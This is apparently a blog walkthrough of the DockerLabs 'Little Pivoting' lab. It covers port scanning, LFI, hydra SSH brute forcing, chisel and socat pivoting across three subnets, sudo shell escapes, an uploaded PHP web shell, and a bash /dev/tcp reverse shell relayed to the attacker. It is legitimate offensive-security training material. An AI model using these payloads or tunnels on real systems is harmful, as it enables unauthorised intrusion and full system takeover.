Post

Docker Labs - Little Pivoting

Posted
Docker Labs - Little Pivoting.
Docker Labs - Little Pivoting.
By racc0x
4 min read

Box Info

NameLittle Pivoting
Release Date19 April, 2024
OSLinux
Rated DifficultyMedium

**Download lab here: https://dockerlabs.es/

Network diagram

Image alt text

Nmap

1
2

nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.2 -oG allports
nmap -sCV -p 22,80 10.10.10.2 -oN targeted

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

# Nmap 7.94SVN scan initiated Fri Sep 20 19:00:41 2024 as: nmap -sCV -p 22,80 -oN targeted 10.10.10.2
Nmap scan report for 10.10.10.2 (10.10.10.2)
Host is up (0.00015s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 03:cf:72:54:de:54:ae:cd:2a:16:58:6b:8a:f5:52:dc (ECDSA)
|_  256 13:bb:c2:12:f5:97:30:a1:49:c7:f9:d0:ba:d0:5e:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 19:00:48 2024 -- 1 IP address (1 host up) scanned in 6.66 seconds

The first page we found a default page from Apache, I will use feroxbuster for directory scan for found some interesting.

1

feroxbuster -u http://10.10.10.2/

Image

http://10.10.10.2/shop/

Image

Its a variable of php, so that means we can use a Local File Inclusion with php.

Image

LFI

1

http://10.10.10.2/shop/index.php?archivo=/etc/passwd

1

http://10.10.10.2/shop/index.php?archivo=../../../../etc/passwd

By adding ‘index.php’ at the end of the URL, the web server interprets that a PHP file in the root directory of the website is being accessed, and then the ‘archivo’ parameter is used to include the specified file in the URL.

Image

We found 2 users:

seller:x:1000:1000:seller,,,:/home/seller:/bin/bash manchi:x:1001:1001:manchi,,,:/home/manchi:/bin/bash

Brute Force Attack | SSH

1

hydra -l manchi -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2 -t  4

Image

1

> hostname -I

Image

The script scans for devices on the network 20.20.20.1 to 20.20.20.254 by pinging each IP address to find out which ones are active.

1
2
3
4
5

#!/bin/bash

for host in $(seq 1 254); do
	timeout 1 bash -c "ping -c 1 20.20.20.$host &>/dev/null" && echo "[+] HOST - 20.20.20.$host"
done; wait

Image

Image

Pivoting | 20.20.20.0/24

manchi

  1. Upload chisel to victim machine

  2. Execute chisel in attack machine

1

./chisel server -p 6150 --reverse

Image

  1. Execute chisel in victim machine.

As you can see, port 1080 is open by default in our machine. This port is crucial for the exchange of communications between 10.10.10.2 and our IP, {10.10.10.1}.

1

./chisel client {IP}:6150 R:socks

Image

  1. We just need to configure the proxychains.

    1. uncomment dynamic_chain and comment strict_chain

Image

    1. Comment socks4 and add socks5 127.0.0.1 1080

Image

Nmap | ProxyChains

Specify ports 22 and 80 because they are the only ones that appeared in the initial scan.

sudo proxychains nmap -sCV -sT -Pn 22,80 20.20.20.3 2>&1 | grep -vE "timeout|OK"

Image

FoxyProxy

We gonna add the socks to foxyproxy extension in firefox for see the web page of 20.20.20.3.

Image

We have another default page from Apache 2. I guess we have to follow the same process as before.

Image

1

feroxbuster -u http://20.20.20.3/ --proxy socks5://127.0.0.1:1080

1

feroxbuster -u http://20.20.20.3/secret.php/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1080 -x php,html

Image

Possible user: Mario

Remote Port Forwarding

I suppose we have to do the brute force attack process again to get “mario” password, however we cannot specify a specific port for hydra, it has its own default port which is 22. Now we will bring port 22 from machine 20.20.20.3 to be our port 22, a remote port forwarding for attack the our port 22.

We need to create a new login as manchi and run again the chisel.

1

./chisel client 10.10.10.1:6150 R:22:20.20.20.3:22

Image

1

./chisel server -p 6150 --reverse

Image

1

lsof -i:22

Image

Brute Force Attack | 20.20.20.3

Mario

1

hydra -l mario ssh://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -t 4

Image

1

proxychains ssh mario@20.20.20.3

Image

sudo -l

Image

GTFO

1

sudo vim -c ':!/bin/sh'

Image

Run againt the script.

Image

Pivoting | 30.30.30.0/24

We send the chisel bin from 20.20.20.2(manchi) to 20.20.20.3(Mario).

Image

Image

Now we will use socat, which will allow us, from the machine 30.30.30.2, to connect with chisel to the machine 20.20.20.2, and the machine 20.20.20.2 will redirect that connection to 10.10.10.1, which is us.

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

Image

1
2

manchi 20.20.20.2
./socat TCP-LISTEN:1111,fork TCP:10.10.10.1:6150

Image

  1. Connection from 20.20.20.3 to 20.20.20.2: The machine 20.20.20.3 connects to the compromised machine (20.20.20.2) on port 1111 using chisel and the fork option allows handling multiple connections simultaneously..

  2. Redirection by socat: When a connection is established on port 1111 of 20.20.20.2, socat redirects that connection to the machine 10.10.10.1 on port 6150.

1
2

root 20.20.20.3
./chisel client 20.20.20.2:1111 R:1111:socks

Image

  1. Data flow: This allows any traffic that arrives at port 1111 on 20.20.20.2 to be sent to 10.10.10.1:6150, and vice versa, enabling communication between 20.20.20.3 and 10.10.10.1 through the compromised machine.

Image

1

2024/09/21 00:48:54 server: session#4: tun: proxy#R:127.0.0.1:1111=>socks: Listening

Nmap | 30.30.30.3

1

sudo proxychains nmap -sCV -sT -Pn -p 22,80 30.30.30.3 2>&1 | grep -vE "timeout|OK"

We have only port 80 open.

Image

RCE

config the foxyproxy for visualizer the web page

Image

I will upload empty file for see if found some error when upload the empty file.

Image

1

feroxbuster -u http://30.30.30.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1111 -x php,html,js,txt

Image

1
2
3
4

<?php 
system($_GET['cmd']);
__HALT_COMPILER();
?>

Image

For get a reverse shell we need to log in as mario. (proxychains ssh mario@20.20.20.3 | chocolate)

Image

Image

Image

1
2

root 20.20.20.3
./socat TCP-LISTEN:443,fork TCP:20.20.20.2:442 

1
2

manchi 20.20.20.2
./socat TCP-LISTEN:442,fork TCP:10.10.10.1:441

Image

1

http://30.30.30.3/uploads/f.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/30.30.30.2/443+0%3E%261%27

Image

Privilege Escalation | SUID

Image

sudo -l

Image

GTFO-Env

sudo env /bin/bash

Image

Pwned!

dockerlabs
DockerLabs Pivoting SSH Brute Force Hydra Sudoers Chisel Socat Remote Port Forwarding SUID Abusing File Upload
This post is licensed under CC BY 4.0 by the author.